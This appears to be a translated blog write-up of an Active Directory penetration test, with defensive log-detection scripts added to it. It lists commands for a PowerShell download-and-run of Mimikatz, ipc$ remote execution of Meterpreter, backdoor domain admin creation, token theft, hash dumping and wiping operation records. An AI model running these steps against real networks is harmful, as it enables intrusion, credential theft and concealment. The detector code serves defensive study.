A complete exploration path from Webshell to domain control

Source: Internet
Author: User
Tags: net time, domain, schtasks

Objective

Most of the material on intranet penetration testing consists of articles by experts telling us how to think, but for a novice like me it has always been rather foggy.

So which tools let you move through an intranet unimpeded has always been what people most want to know.

Today, in the spirit of the teachers who shared with me so selflessly, I have specially sorted out three years of "seeking masters, asking sisters" and the artifacts (tools) I collected along the way, and written down the key knowledge points.

The relevant knowledge points are summarized as follows:

    • Generating AV-evading payloads with Veil
    • Privilege escalation attempts with MSF under Meterpreter
    • BypassUAC attempts with MSF under Meterpreter
    • Correlating information during an intranet penetration test
    • Adding Meterpreter routes and the related scans
    • Using PowerShell under Meterpreter
    • Using Meterpreter post modules
    • Using MSF with a custom-generated payload
    • Stealing tokens by process injection

In fact the point is not how many knowledge points there are; we only need to concentrate on the important links between them.

I am sharing this so that everyone on Security Pulse can communicate, learn and progress together (and show off together).

First of all, the shell was handed to me, and obtaining it is not the focus of this write-up, so I skip it here.

The environment for penetration testing is detailed as follows:

    • A: bastion machine (the webshell machine), Windows Server 2012
    • B: bastion machine, Windows (the PowerShell scanning machine)
    • C: bastion machine running a domain admin's process, Windows Server 2012
    • D: several further bastion machines

First step: reverse Meterpreter callback

In fact no penetration test goes as smoothly as we imagine, and this one also began with a different sort of journey: I spent almost four hours on the whole test, and most of that time went into solving the following problems.

1 The webshell cannot upload an exe

I originally meant to upload the Meterpreter payload directly and have it call back, but found it could not be uploaded. The alternative is the PowerShell Meterpreter module.

2 The Meterpreter reverse_tcp module did not call back successfully

For the MSF payload callback I first tried Meterpreter's reverse_tcp module. It could connect back, but never built a working Meterpreter session, so there must have been some monitoring that detected our behaviour. On that basis I tried Meterpreter's reverse_https module, which called back successfully.

The detailed diagram of the problems encountered and the resolution process is as follows:

Figure 1-1 Using payload

Figure 1-2 setting up payload for HTTPS

Figure 1-3 Callback succeeded

Second step: attempting privilege escalation on Windows Server 2012

What is the first thing that comes to mind when we get a (low-privileged) webshell? Privilege escalation, of course. I thought the same, so our journey started with it.

First, searching MSF for MS15 gives you a few exploit modules. I tried ms15_05 and ms15_078; all ended in failure.

The detailed figure is as follows:

Figure 2-1 The privilege escalation attempt failed

Third step: BypassUAC test on the current account

One thing I forgot to say at the start is what the webshell itself is: our current webshell is JSP, running with the permissions of an ordinary domain user.

I also wondered whether escalation could be completed through BypassUAC, but the result, as you can imagine, was another failure.

The details of the present situation are as follows:

Figure 3-1 Current User rights

Figure 3-2 BypassUAC attempt

Fourth step: related information collection

Even though escalation has not succeeded at this point, we can still use the current user to conduct domain penetration testing. The methods currently available to us are:

1 Collect information about the domain, including all users, all computers, and the key groups.

The following commands are commonly used:

    net user /domain
    net group "Domain Computers" /domain
    net group "Domain Admins" /domain      (view the domain administrators)
    net localgroup Administrators
    net view /domain

2 Collect information about SQL Server. If the current bastion machine runs SQL Server and our current domain user happens to have access to it, we can use sqlcmd for information gathering and for scanning attacks.

I only mention this here; for reasons of length I won't go into it in depth.

Based on my experience, I did only the simplest information gathering here: first using sqlcmd to get a list of all SQL Server machines, the current bastion machine's name and the current bastion machine's IP, plus net view for some simple information gathering.

The detailed figure is as follows:

Figure 4-1 SQLCMD Get information

Figure 4-2 the current machine name

Figure 4-3 Machine names from net view

Fifth step: information analysis, successfully obtaining permissions on a server

Once the information is collected, we need to start thinking about what to do next.

First let's take a look at what we currently have:

    • A: process permissions of one domain user on the current bastion machine, which is Windows Server 2012; privilege escalation failed. (Even if escalation had succeeded, we still could not obtain the user's plaintext password.)
    • B: the user name on the current bastion machine
    • C: the names of the other machines with SQL Server installed, as obtained from sqlcmd

At present our ideas are:

    • 1 Use Meterpreter's current permissions to add a route and scan for weak passwords
    • 2 Use PowerShell to scan the internal network (used in this test, but not at this point; more on it later; at this moment PowerShell is definitely another artifact of intranet penetration testing)
    • 3 Use the current user's rights to set up socks4a, then scan the intranet through socks using the information from the first step
    • 4 Use the current user's permissions to batch-test IPC$ or dir against the computers in the domain (that is, dir another computer's C$; success means we have permission there)

After the above analysis I chose the laziest method: compare the current bastion machine's name with the names from net view, pick out machines with very similar names, and test them manually.

This was also very fast; it succeeded on the second attempt.

The detailed procedure is as follows:

    net use \\ip\c$

    tasklist /v /S ip

Figure 5-1 Net use test succeeded

Figure 5-2 tasklist Successful execution

Sixth step: domain information collection

Domain information collection was already described in the fourth step, so I won't introduce it at length; here it is done on the basis of the fifth step. The knowledge points involved are:

1 Domain information collection, with the following commands:

    net group "Domain Admins" /domain
    net group /domain
    net group "Domain Controllers" /domain
    net group "Enterprise Admins" /domain

2 ipc$ intrusion; anyone interested can Baidu the classic ipc$ intrusion

    net use \\ip\c$

    copy bat.bat \\ip\c$      (where bat.bat is the PowerShell Meterpreter payload)

    net time \\ip

    at \\ip time c:\bat.bat

3 Upload the plaintext-credential grabbing tool 64.exe (the Mimikatz artifact); everyone knows it.

    upload /home/64.exe c:\

    shell

    cd \

    64.exe

4 View the details of a dumped user

    net user xxx /domain

5 Use Meterpreter's ps to view the process list for the relevant user

6 Attempt domain token impersonation

    use incognito

    list_tokens -u

    impersonate_token xxxxxx

In this penetration test I tried all of the knowledge points above; the details follow:

Figure 6-1 Viewing the domain admins

Figure 6-2 Viewing the domain groups

Figure 6-3 Viewing the domain controllers

Figure 6-4 Viewing the Enterprise Admins group

Figure 6-5 Copying data via the share

Figure 6-6 Classic ipc$

Figure 6-7 Meterpreter callback succeeded

Figure 6-8 Uploading a file

Figure 6-9 Viewing server information

Figure 6-10 Grabbing passwords

Figure 6-11 Viewing domain user rights

Figure 6-12 Viewing domain user rights

Figure 6-13 Token stealing attempts

Figure 6-14 Viewing the primary domain controller's IP

Seventh step: SMB rapid expansion of control permissions

What are you thinking as a reader at this moment? Isn't it that after the sixth step you could go to bed? After all, it is five o'clock in the morning.

But at this moment a professional who seeks masters, asks sisters and worships gods does not think so.

We have to make the final sprint, because the bell of dawn has rung.

Let's take a look at what permissions we currently have:

Two bastion machines and the rights of two users.

What we want to do now is very simple: rapidly expand control within the network. How? In fact also very simple: rapid scanning fulfils our dream.

Specifically:

    • 1 Use the two sets of user rights we have acquired to scan quickly (scan where? see the last picture of the sixth step, Figure 6-14: the domain controller's IP segment)
    • 2 smb_login scan
    • 3 Port forwarding into the intranet

Now we have the idea, and the artifact MSF finally ushers in its own heaven of mischief. Let's play happily.

Detailed knowledge points are as follows:

    • 1 MSF add route: route add IP mask SessionID
    • 2 The smb_login module, or psexec_scanner (you'll have to search for this module yourself)
    • 3 Meterpreter port forwarding
    • 4 The MSF socks4a module (not used in this test, which does not mean it isn't good)
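From the defender's side, the smb_login scan in point 2 is visible in the Windows Security log of every target: each failed attempt is a logon failure event (Event ID 4625, network logon, Logon Type 3) whose source address is the scanning host, and a scan produces a burst of them across many hosts in a short time. The Python below is an added example written for this write-up, not code from the original post or from Metasploit; it groups failures by source address and flags any source that fails against many distinct hosts or accounts inside a sliding window. The events it runs over are constructed in the script, and the field names (ts, src_ip, target_user, target_host) are a simplified normalisation of the real 4625 fields.

```python
"""Detect an smb_login-style credential scan from Windows logon-failure events.

A scan of many hosts with one or two credentials shows up on each target as
Event ID 4625 (failed logon) with Logon Type 3 (network), all from the same
source address, in a short burst. Grouping by source and counting distinct
targets inside a sliding window separates that from a user mistyping a
password a few times. Field names are a simplified normalisation of the
4625 fields (assumption of this example); all events below are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta


def detect_logon_spray(events, window=timedelta(minutes=5),
                       min_hosts=5, min_accounts=5):
    """Return one alert per source address whose failed network logons, inside
    any `window`, touch at least `min_hosts` distinct hosts or `min_accounts`
    distinct accounts. `events` is an iterable of dicts with keys
    ts (ISO 8601 string), event_id, logon_type, src_ip, target_user, target_host.
    """
    by_src = defaultdict(list)
    for ev in events:
        # Only failed network logons are relevant; successes and interactive
        # failures on the console are ignored.
        if ev["event_id"] == 4625 and ev["logon_type"] == 3:
            by_src[ev["src_ip"]].append(ev)

    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        win = deque()          # events inside the current sliding window
        best = None            # the most spread-out window seen for this source
        for ev in evs:
            t = datetime.fromisoformat(ev["ts"])
            win.append((t, ev))
            while t - win[0][0] > window:
                win.popleft()
            hosts = {e["target_host"] for _, e in win}
            users = {e["target_user"] for _, e in win}
            spread = len(hosts) + len(users)
            if best is None or spread > best["hosts"] + best["accounts"]:
                best = {"src_ip": src,
                        "first": win[0][0].isoformat(), "last": t.isoformat(),
                        "hosts": len(hosts), "accounts": len(users),
                        "failures": len(win)}
        if best["hosts"] >= min_hosts or best["accounts"] >= min_accounts:
            alerts.append(best)
    return alerts


def _ev(ts, src, user, host, event_id=4625, logon_type=3):
    """Build one normalised event record (constructed sample data)."""
    return {"ts": ts, "event_id": event_id, "logon_type": logon_type,
            "src_ip": src, "target_user": user, "target_host": host}


# Constructed sample: one host sweeps eight servers with a single account in
# 35 seconds, while a user on another machine fails twice against their own
# workstation and then logs on successfully.
SAMPLE_EVENTS = [
    _ev(f"2019-03-02T05:10:{sec:02d}", "10.0.5.21", "CORP\\jsmith", f"SRV-{n:02d}")
    for sec, n in zip(range(0, 40, 5), range(1, 9))
] + [
    _ev("2019-03-02T05:12:01", "10.0.7.3", "CORP\\alee", "WS-22"),
    _ev("2019-03-02T05:12:09", "10.0.7.3", "CORP\\alee", "WS-22"),
    _ev("2019-03-02T05:12:30", "10.0.7.3", "CORP\\alee", "WS-22", event_id=4624),
]

if __name__ == "__main__":
    for alert in detect_logon_spray(SAMPLE_EVENTS):
        print(alert)
```

The thresholds are deliberately low for the sample; in production they are tuned per environment, and the same logic is usually run against the domain controllers' 4776 (NTLM validation) events as well, which see every attempt in one place.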

Figure 7-1 Setting parameters for Smb_login

Figure 7-2 Machines where the brute-force succeeded

Figure 7-3 Viewing the permissions that have been acquired

Figure 7-4 Port forwarding and currently owned permissions

Eighth step: PowerShell gets the machines where domain admins are logged on

Intranet penetration testing has two great artifacts that must be mentioned: MSF and PowerShell. But I see that everyone basically uses them separately, or rarely comes across the combination during a test, so today you as a reader are blessed.

First of all, PowerShell in intranet penetration testing can not only scan, but also brute-force and forward, and of course do much more.

The following three modules are commonly used:

    • 1 Empire is said to be an artifact, and indeed is; I haven't used it, so for now not much to say
    • 2 PowerUp is said to be a privilege escalation artifact, and indeed is; I seldom use it, so for now not much either
    • 3 PowerView is said to be a domain penetration artifact, and indeed is; I have been using it, very beautiful

Using PowerShell is actually very simple, but most people pay little attention to how they invoke it.

There are three main ways to invoke it:

1 The first is of course to download and execute locally, for example: powershell "IEX (New-Object Net.WebClient).DownloadString('Http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

2 The second is to upload the PowerShell file to the bastion machine and execute it locally: powershell.exe -exec bypass -Command "& {Import-Module .\PowerView.ps1; Invoke-UserHunter}"

3 Upload to the remote machine, then Import-Module it; using any of PowerView's modules is very simple: call the method directly. The diagram below shows it.
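Each of the three invocation methods above leaves a recognisable trace in process-creation logging (Security Event ID 4688 with command-line auditing enabled, or Sysmon Event ID 1): the download cradle (New-Object Net.WebClient plus DownloadString, fed to IEX), the execution-policy bypass, and an Import-Module of a script that was just uploaded to disk. The Python below is an added example for this write-up, not code from the original post or from the PowerView project; it scores PowerShell command lines against those patterns and ranks the hits. The sample command lines, host names, user names and the URL in them are constructed.

```python
"""Score PowerShell command lines against the invocation patterns described
above, as a detection engineer would over process-creation logs (Security
Event ID 4688 with command-line auditing, or Sysmon Event ID 1).

Every rule is case-insensitive because PowerShell is. The sample events,
host names, user names and URL at the bottom are constructed for this
example.
"""
import re

# (indicator name, pattern). Order only affects the order of names in a hit.
RULES = [
    # Download cradle: (New-Object Net.WebClient).DownloadString(...)
    ("download_cradle",
     re.compile(r"New-Object\s+(System\.)?Net\.WebClient.*?\.Download(String|File|Data)\s*\(",
                re.I | re.S)),
    # Downloaded text handed to Invoke-Expression or its alias IEX
    ("invoke_expression",
     re.compile(r"(^|[\s;({\"'])(iex|Invoke-Expression)\b", re.I)),
    # -ExecutionPolicy Bypass and its accepted abbreviations (-exec, -ex, -ep)
    ("execution_policy_bypass",
     re.compile(r"-(exec|ex|ep|executionpolicy)\s+(bypass|unrestricted)", re.I)),
    # Base64-encoded command (-EncodedCommand / -enc / -ec / -e)
    ("encoded_command",
     re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    # Window hidden from the interactive user
    ("hidden_window",
     re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    # Import-Module pointed at a .ps1 file on disk (an uploaded script)
    ("import_module_from_disk",
     re.compile(r"Import-Module\s+\.?\\?[\w.-]+\.ps1", re.I)),
]


def analyze_powershell_cmdline(cmdline):
    """Return the names of every indicator the command line triggers."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(events):
    """events: iterable of (host, user, cmdline). Returns only the command
    lines that triggered at least one indicator, most indicators first."""
    hits = []
    for host, user, cmd in events:
        matched = analyze_powershell_cmdline(cmd)
        if matched:
            hits.append({"host": host, "user": user,
                         "indicators": matched, "cmdline": cmd})
    hits.sort(key=lambda h: len(h["indicators"]), reverse=True)
    return hits


# Constructed sample process-creation events: (host, user, command line).
SAMPLE_EVENTS = [
    ("SRV-A", "CORP\\jsmith",
     "powershell \"IEX (New-Object Net.WebClient).DownloadString("
     "'http://files.example.invalid/im.ps1'); Invoke-Mimikatz -DumpCreds\""),
    ("SRV-A", "CORP\\jsmith",
     "powershell.exe -exec bypass -Command \"& {Import-Module .\\PowerView.ps1; Invoke-UserHunter}\""),
    ("WS-17", "CORP\\svc_backup",
     "powershell.exe -NoProfile -File C:\\Scripts\\nightly-backup.ps1"),
    ("WS-22", "CORP\\alee",
     "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAu"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], hit["user"], hit["indicators"])
```

Command-line matching only sees what is passed on the command line; the third method (Import-Module of a file already on the host, then calling functions interactively) is better caught with PowerShell script block logging (Event ID 4104), which records the script content itself.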

If you have read this far, your PowerShell journey starts here, and the intranet will begin to become simple.

Figure 8-1 PowerView methods

Enough nonsense; now for the actual practice. It's really very simple, I truly mean very simple: a single sentence takes care of it.

Invoke-UserHunter in PowerView finds the machines on which domain administrators are currently logged on.

We'll use it to get further information on this journey. Details:

Figure 8-1 PowerShell execution command

Figure 8-2 PowerView results

Ninth step: domain admin access (Windows 2012 permissions)

After the eighth step, don't you as a reader feel a bit of the harvest? Intranet penetration testing is not so hopeless after all.

Artifact after artifact, and yet: this is Windows Server 2012, and although a domain admin is logged on, our password-grabbing artifact is impotent here, and we cannot modify the registry and wait for the administrator to log in again.

Now look at the problem we have: through PowerShell we successfully found a Windows Server 2012 machine with a domain admin logged on, and we have permissions on that machine, so now we go and take care of the domain controller.

The ideas are as follows:

    • 1 Modify the registry and wait for the domain admin to log in again to grab credentials (by then the daylilies would be cold, i.e. far too slow)
    • 2 Inject into the process via PowerUp to get domain permissions (not used, abandoned for now); of course one can also write plugin-like functionality to inject into the process and get permissions
    • 3 MSF's token-stealing feature (this is easy to do)

Knowing the idea, let's start our happy journey. Seek master, ask sister, seek artifact, professionally seek domain control:

1 Again use the classic IPC intrusion technique to get a Meterpreter callback, then

    getsystem           (SYSTEM permissions)

    ps                  (view the process in which the domain admin is running)

    migrate PID         (inject into that process)

2 Continue the classic ipc$ on to the domain controller

In the Meterpreter shell:

    net use \\<domain controller ip>\c$

    net time \\<domain controller ip>

    copy bat.bat \\<domain controller ip>\c$

    at \\<domain controller ip> time c:\bat.bat      (unexpected error, hinting at schtasks.exe, which I'm not familiar with) {Security Pulse note: on Server 2008 and above the at command is deprecated; use schtasks scheduled tasks instead}

3 There is more than one path to success: add a domain admin account

    net user demo demo /add /domain

    net group "Domain Admins" demo /add /domain

At this point we already have domain control permissions.
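Both routes in points 2 and 3 above are loud in the Security logs of the target and of the domain controller, which is exactly what a defender should be watching for: the net use \\ip\c$ step is a network share access event for an administrative share (Event ID 5140 with ShareName \\*\C$ or \\*\ADMIN$), the at/schtasks step is a scheduled-task creation (Event ID 4698) on the same host by the same account minutes later, and the "add a domain admin" shortcut is an account creation (4720) immediately followed by a membership change on Domain Admins (4728). The Python below is an added example for this write-up, not code from the original post; it correlates those events by host, account and time, and covers the ipc$ chain of the sixth step as well. The events are constructed, and the field names are a simplified normalisation of the real event fields.

```python
"""Correlate the admin-share -> scheduled-task lateral movement chain and the
'new account straight into Domain Admins' pattern in Windows Security events.

Relevant events: 5140 (network share accessed; ShareName \\*\C$ / \\*\ADMIN$),
4698 (scheduled task created), 4720 (user account created) and 4728 (member
added to a security-enabled global group). Field names are a simplified
normalisation of the real event fields (assumption of this example) and all
sample events are constructed.
"""
from datetime import datetime, timedelta

ADMIN_SHARES = {r"\\*\C$", r"\\*\ADMIN$"}
SENSITIVE_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}


def correlate(events, window=timedelta(minutes=10)):
    """Return alerts for (a) a scheduled task created on a host by an account
    that accessed one of its admin shares over the network within `window`,
    and (b) any addition to a sensitive group, escalated when the member
    account was created within `window` beforehand."""
    events = sorted(events, key=lambda e: e["ts"])
    share_access = {}   # host -> list of (ts, src_ip, user) admin-share hits
    created = {}        # member -> ts of the account creation
    alerts = []
    for ev in events:
        t = datetime.fromisoformat(ev["ts"])
        eid = ev["event_id"]
        if eid == 5140 and ev["share"] in ADMIN_SHARES:
            share_access.setdefault(ev["host"], []).append((t, ev["src_ip"], ev["user"]))
        elif eid == 4698:
            # Task created by the same account that just opened the admin share
            for t0, src, user in share_access.get(ev["host"], []):
                if user == ev["user"] and timedelta(0) <= t - t0 <= window:
                    alerts.append({"type": "remote_task_after_admin_share",
                                   "host": ev["host"], "src_ip": src,
                                   "user": user, "task": ev["task"]})
                    break
        elif eid == 4720:
            created[ev["member"]] = t
        elif eid == 4728 and ev["group"] in SENSITIVE_GROUPS:
            t0 = created.get(ev["member"])
            fresh = t0 is not None and t - t0 <= window
            alerts.append({"type": "new_account_made_admin" if fresh else "privileged_group_add",
                           "host": ev["host"], "user": ev["user"],
                           "member": ev["member"], "group": ev["group"]})
    return alerts


def _ev(ts, event_id, host, user, **fields):
    """Build one normalised event record (constructed sample data)."""
    return {"ts": ts, "event_id": event_id, "host": host, "user": user, **fields}


SAMPLE_EVENTS = [
    # C$ opened from 10.0.5.21, then a task created on the same host 70 s later
    _ev("2019-03-02T05:40:00", 5140, "SRV-B", "CORP\\jsmith", share=r"\\*\C$", src_ip="10.0.5.21"),
    _ev("2019-03-02T05:41:10", 4698, "SRV-B", "CORP\\jsmith", task=r"\At1"),
    # Backup service touching C$ with no task afterwards: no alert
    _ev("2019-03-02T05:42:00", 5140, "FS-01", "CORP\\svc_backup", share=r"\\*\C$", src_ip="10.0.9.9"),
    # Ordinary local task creation with no preceding remote share access
    _ev("2019-03-02T05:43:00", 4698, "WS-22", "CORP\\alee", task=r"\Microsoft\Windows\UpdateOrchestrator\Reboot"),
    # A user created on the DC and added to Domain Admins five seconds later
    _ev("2019-03-02T05:50:00", 4720, "DC01", "CORP\\jsmith", member="CORP\\demo"),
    _ev("2019-03-02T05:50:05", 4728, "DC01", "CORP\\jsmith", member="CORP\\demo", group="Domain Admins"),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Event 5140 requires the "Audit File Share" subcategory to be enabled and 4698 requires "Audit Other Object Access Events"; without them the chain is only visible in the Task Scheduler operational log. Any change to Domain Admins should page someone regardless of the timing check.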

The details are as follows:

Figure 9-1 Injecting into the domain admin's process and connecting to the domain controller

Figure 9-2 Adding a domain admin account

Figure 9-3 Checking whether the domain admin addition succeeded

Tenth step: domain controller, here I come (MSF psexec reverse shell)

A look at the time: seven o'clock in the morning; the morning sun is about to rise. What is your mood at the moment? It's time for a morning run. The sun rises in the east, and domain controller authority has finally arrived.

First of all, there are many ways to log in to the domain controller; below I list the few I know, and I believe everyone knows them too:

    • 1 Port forwarding or SOCKS to log on to the domain controller's Remote Desktop
    • 2 Log in to another computer in the intranet and use PsExec to get a shell back
    • 3 Use MSF's psexec to call back Meterpreter

Knowledge to be aware of for the callback: we use psexec to call back Meterpreter, which involves:

    • 1 Using the psexec module in MSF
    • 2 Using a custom module with Meterpreter: when the payload inevitably gets killed by AV, how to use your own Veil-generated payload

The detailed process is as follows:

Figure 10-1 PsExec test

Figure 10-2 PsExec default callback unsuccessful

Figure 10-3 Meterpreter's HTTPS module calls back successfully

Figure 10-4 Domain controller system information

11th step: Meterpreter gets all users' hashes

With domain permissions, dumping hashes is essential if we want deep control.

First take a look at the knowledge we need:

    • 1 MSF has two usable modules: hashdump, which can only export local hashes (test it and you'll see), and smart_hashdump, which can export the domain users' hashes.
    • 2 PowerShell has modules that export them directly; try them yourself
    • 3 Use of WCE, Mimikatz and other artifacts

Here I used MSF's smart_hashdump module. Note that to export hashes with this module you must have SYSTEM permissions.

The detailed process is as follows:

Figure 11-1 Use of the Smart_hashdump module

12th step: the tortuous path of exploration

Here are the techniques used above, and some of the detours. The write-up is almost done.

A journey from webshell to domain control is complete. Of course I took some detours along the way and point them out here; corrections are welcome, let's learn together.

Figure 12-1 Session control chart

According to the figure, I now control 5 sessions in total, four of which are the ones we wanted: session 1, session 2, session 4 and session 5.

Session 1 was obtained from the webshell callback, session 2 from information analysis, session 4 from getting the domain administrator, and session 5 is the domain controller.

Session 3 is the detour I went through, which wasted time.

To complete penetration tests better, faster and more effectively in future, we should practise our swordsmanship regularly: better not to draw the sword at all, and once drawn, it should draw blood.

13th step: I came gently and I leave softly; Administrator, goodbye (cleanup)

For a more successful friendly test we must come without a shadow and go without a trace, so the finishing touches also unfold quietly.

The relevant knowledge points are:

    • 1 Delete the previously added domain admin account
    • 2 Remove all tools used in the process
    • 3 Delete all of your operation records
    • 4 Close all Meterpreter sessions

In this process we uploaded two files, bat.bat and the 64-bit Mimikatz password-grabbing tool;

they can be deleted directly.

Figure 13-1 Deleting a user

Figure 13-2 Closing the session

Summary

To sum up, let me say something nice. Or shout the slogan first: "Seek sister, seek master, seek artifact".

Thank you to the teachers who have silently shared with me for more than three years, and thank you to the sister who quietly stayed by my side while I did this friendly test.

Thank you to all the artifacts of these years; without the support of these resources I would not have completed this friendly test.

As penetration testing enthusiasts we have always pursued the beautiful dream in our hearts;

as programmers we simply want to code. Life is so beautiful, why don't we join together and share the good.

Directory

    • Domain Penetration Testing Tutorial (Windows Server 2012)
    • Objective
    • First step: reverse Meterpreter callback
    • Second step: attempting privilege escalation on Windows Server 2012
    • Third step: BypassUAC test on the current account
    • Fourth step: related information collection
    • Fifth step: information analysis, successfully obtaining permissions on a server
    • Sixth step: domain information collection
    • Seventh step: SMB rapid expansion of control permissions
    • Eighth step: PowerShell gets the machines where domain admins are logged on
    • Ninth step: domain admin access (Windows 2012 permissions)
    • Tenth step: domain controller, here I come (MSF psexec reverse shell)
    • 11th step: Meterpreter gets all users' hashes
    • 12th step: the tortuous path of exploration
    • 13th step: I came gently and I leave softly; Administrator, goodbye (cleanup)
    • Summary
